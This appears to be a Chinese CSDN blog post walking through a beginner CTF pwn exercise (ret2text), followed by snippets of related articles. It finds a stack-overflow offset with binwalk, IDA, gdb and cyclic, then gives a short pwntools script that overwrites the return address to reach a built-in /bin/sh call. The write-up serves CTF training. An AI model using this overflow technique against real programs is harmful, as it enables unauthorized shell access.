pwn20180830

最新推荐文章于 2025-06-27 17:44:08 发布
最新推荐文章于 2025-06-27 17:44:08 发布
阅读量771 收藏 1
点赞数 1
CC 4.0 BY-SA版权
文章标签: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/chenzzhenguo/article/details/82227264
博客围绕CTF Pwn题中获得最高权限的练习展开。给出题目链接及提取码,介绍使用binwalk、ida、gdb等工具解题。先通过binwalk扫描、ida反编译,确定考点为栈溢出和获取权限,再确定输入最大字符数,最后利用栈溢出写脚本获得最高权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

获得最高权限练习
题目:https://pan.baidu.com/s/1hsxnKkguZRPLPZqGI_y7_Q
提取码:n70j

工具:binwalk ida gdb

题解:
1、binwalk扫一下,32位的。跑一下,得到关键字。丢入ida看一下,反编译发现不管输入什么,都会输出之后结束
2、打开system函数,明显看到/bin/sh。那这个考的是栈溢出和获取权限的知识了,首先,我们先得到s中最多能存多少字符。先开个200的字符串试一下(cyclic 200),为了看到更多消息,在gdb中打开文件。
键入run,键入200个字符,报错,报错位置即为输入最大字符数。用(cyclic -l 0x…)查看
3、知道最大数目后,利用栈溢出,写脚本获得最高权限。

#!usr/bin/env/ python
#告诉操作系统python装在哪里
from pwn import *
#调用pwn库

sh=process('./ret2text')
#process()本地创建进程
elf=ELF('./ret2text')
target=0x0804863A
#即/bin/sh所在位置
sh.sendline('a'*112+p32(target))
#send恢复生成器并“发送”一个值,该值成为当前yield表达式的结果。
sh.interactive()
#交互页面

键入python exp.py ret2text 获得最高权限
这里写图片描述

知识点:
1、栈溢出和获取最高权限

CTF pwn/re手在学习过程中的零碎操作积累
lifanxin的博客
09-06 1643
零碎操作积累概述使用指定版本的libc运行pwn题使用指定版本的libc编译源程序总结 概述   谨以此片文章为我那不争气的记性做个记录,随便造福大家,另外如果各位看官也有些骚操作或者基操的话,也请不吝赐教,留言评论,在下定临表涕零,感激不尽。 使用指定版本的libc运行pwn题   这里给几个下libc的网站: ubuntu glibc官网 清华大学开源镜像站   使用指定版本libc运行pwn题的终端操作: # 指定libc $ LD_PRELOAD=/usr/local/libc/libc-2.2
ctfshow pwn wp
Chandra的学习之路
11-26 1041
mov eax,[esi]:将esi中的值作为地址(080490E8地址单元中的值,eax只能读取4个字节的内容,读取一个字符Ascii码即1个字节),然后将该地址单元的值赋给eax,我们在ida可以查看080490E8地址单元的值(Welc倒序的ascii码)。根据题目要求,直接查看寄存器寻址方式的内容,可以得到edx的值为0x36d,根据之前某题大写提示,改成0x36D,即:ctfshow{0x36D}mov esi,msg:将msg的地址赋给esi,此时esi寄存器中的值为080490E8;
PWM(脉冲宽度调制)信号原理
热门推荐
物联网研究室BBC的博客
03-03 4万+
1、什么是PWM信号 PWM,英文名Pulse Width Modulation,是脉冲宽度调制缩写,它是通过对一系列脉冲的宽度进行调制,等效出所需要的波形(包含形状以及幅值),对模拟信号电平进行数字编码,也就是说通过调节占空比的变化来调节信号、能量等的变化,占空比就是指在一个周期内,信号处于高电平的时间占据整个信号周期的百分比,例如方波的占空比就是50%. 2、如何实现PWM信号输...
一次受益颇多的CTF(RE/PWN)
蚁景网安学院
02-18 991
##前言这个是Hgame_CTF第三周的题目,难度一周比一周大,而且还涉及了多方面的知识,一整期做下来对或许会有一个比较大的提升。其中有一道逆向,是通过监控本地端口来获取输入的,第一次接...
【二进制安全】PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
06-27 829
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
PWN-入门基础
工作学习笔记
05-27 5789
简单介绍四个方面的内容:一是什么是PWN、二是做PWN所需知识储备、三是基于Ubuntu搭建PWN环境、四是在公网上练习PWN题。
【二进制安全】PWN基础入门大全(非常详细),零基础入门到精通,看这一篇就够了
2401_84618514的博客
11-07 4542
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.youkuaiyun.com/weixin_41748164/article/details/127874334
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
Pwn 二进制漏洞审计
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-28 3999
PWN 二进制漏洞审计
PWN基础知识及基础栈溢出手法
山高路远
04-12 4310
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
PWN入门(一)
lulu001128的博客
04-24 3236
知识
PWN概论
m0_52249553的博客
05-06 8622
什么是pwn pwnctf解题赛中的一个题目类别,它在黑客俚语中代表着攻破,获取权限,由“own”这个词引申而来。在CTF比赛中它代表着溢出类的题目,常见的类型有整数溢出、栈溢出、堆溢出等。主要考查参赛选手对漏洞的利用能力。 学习pwn的知识储备 反汇编工具 在比赛中我们会拿到一个二进制文件(由c文件编译而来),我们要找出这个可执行文件的漏洞,但二进制文件是由0和1的机器码组成,正常人是直接无法看懂里面的内容的,这时我们需要利用反编译工具将这个二进制文件反编译为我们能看懂的语言(汇编语言或者c语言
linux pwn 基础知识
sky123博客
08-11 3486
环境搭建 虚拟机安装 镜像下载网站 为了避免环境问题建议 22.04 ,20.04,18.04,16.04 等常见版本 ubuntu 虚拟机环境各准备一份。注意定期更新快照以防意外。 虚拟机建议硬盘 256 G 以上,内存也尽量大一些。硬盘大小只是上界,256 G 不是真就占了 256 G,而后期如果硬盘空间不足会很麻烦。 基础工具 vim sudo apt install vim gedit 不习惯 vim 的可以使用 gedit 文本编辑器。 sudo apt install gedit git
PWN入门(三)——ret2text /ret2syscall /ret2shellcode
Jack_Grealish的博客
11-10 1569
根据目录看文章结构,优快云中没有Typora那么多级标题,所以有点乱。
PWN入门(一)——PWN是做什么的
Jack_Grealish的博客
11-02 793
根据目录看文章结构,优快云中没有Typora那么多级标题,所以有点乱。
栈溢出——ret2text(一)
weixin_68408599的博客
05-07 1208
拿到 system 函数和 /bin/sh 字符串,我们就需要获取 rdi, rsi, rdx, rcx, r8, r9 它们的地址,首先要获取的是。可以看到,此程序为32位系统,没有canary保护,也就是说我们溢出时,不需要注意在栈上的保护,可以随意进行溢出。紧接着我们又在左边的函数图里,看到了一个backdoor函数,这个函数存在bash代码,调用这个函数即可获取相关系统权限。首先声明了一个名为 buf 的大小为14字节的字符数组,它距离ebp的距离为0x12,这里通过read函数。
pwn
03-19
### Pwn 的定义与背景 Pwn 是网络安全领域中的一个重要术语,在渗透测试和漏洞利用方面具有广泛的应用。它通常指通过发现并利用软件或系统的安全漏洞,从而获得未经授权的访问权限或控制权的行为[^1]。 #### 技术概念 在网络安全上下文中,“pwn”可以涉及多种技术和方法,主要包括但不限于缓冲区溢出、格式化字符串漏洞、整数溢出以及返回导向编程(ROP)。这些技术允许攻击者操控程序执行流程,注入恶意代码或者泄露敏感数据。 #### 编程环境下的应用 从编程的角度来看,实现 pwn 需要深入理解目标应用程序的工作机制及其底层架构。例如,在 C 或 C++ 中开发时,如果未正确处理用户输入,则可能导致栈溢出等问题。以下是检测潜在可被利用漏洞的一个简单 Python 脚本示例: ```python import subprocess def test_vulnerability(payload): try: result = subprocess.run(['./vulnerable_program', payload], capture_output=True, text=True) return result.stdout except Exception as e: return str(e) if __name__ == "__main__": user_input = "A" * 256 # Example of a large input to check buffer handling. response = test_vulnerability(user_input) print(response) ``` 此脚本尝试向可能存在缓冲区溢出问题的目标二进制文件发送大量字符作为参数,并观察其行为变化以判断是否存在脆弱点。 ### 工具支持 对于希望从事此类活动的研究人员来说,有许多专门设计用于辅助分析和开发exploit的工具可供选择,比如 radare2 和 gdb 这样的调试器可以帮助研究内存布局;Metasploit 则提供了现成payloads集合便于快速验证某些假设条件是否成立等等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值